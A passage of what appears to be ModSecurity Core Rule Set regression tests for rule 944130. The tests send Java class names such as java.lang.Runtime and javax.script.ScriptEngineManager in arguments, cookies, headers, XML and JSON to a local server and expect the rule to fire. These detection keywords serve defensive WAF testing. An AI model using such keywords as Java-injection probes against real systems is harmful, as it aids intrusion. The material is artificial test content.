"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-342 + desc: "Argument name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-343 + desc: "Cookie test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-344 + desc: "Cookie name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Runtime=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-345 + desc: "Request header test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-346 + desc: "XML attribute value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-347 + desc: "XML element value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-348 + desc: "Nested XML element value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-349 + desc: "Content-Type text/plain includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-350 + desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Runtime\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-351 + desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Runtime\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-352 + desc: "Argument test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-353 + desc: "Argument name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-354 + desc: "Cookie test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.String + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-355 + desc: "Cookie name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.String=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-356 + desc: "Request header test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.String + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-357 + desc: "XML attribute value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-358 + desc: "XML element value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-359 + desc: "Nested XML element value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-360 + desc: "Content-Type text/plain includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-361 + desc: "Content-Type application/json arg value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.String\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-362 + desc: "Content-Type application/json arg name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.String\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-363 + desc: "Argument test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-364 + desc: "Argument name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-365 + desc: "Cookie test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.StringBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-366 + desc: "Cookie name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.StringBuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-367 + desc: "Request header test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.StringBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-368 + desc: "XML attribute value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-369 + desc: "XML element value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-370 + desc: "Nested XML element value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-371 + desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-372 + desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.StringBuilder\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-373 + desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.StringBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-374 + desc: "Argument test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-375 + desc: "Argument name includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-376 + desc: "Cookie test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.System + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-377 + desc: "Cookie name includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.System=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-378 + desc: "Request header test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.System + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-379 + desc: "XML attribute value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-380 + desc: "XML element value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-381 + desc: "Nested XML element value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-382 + desc: "Content-Type text/plain includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-383 + desc: "Content-Type application/json arg value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.System\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-384 + desc: "Content-Type application/json arg name includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.System\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-385 + desc: "Argument test includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-386 + desc: "Argument name includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-387 + desc: "Cookie test includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=javax.script.ScriptEngineManager + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-388 + desc: "Cookie name includes keyword 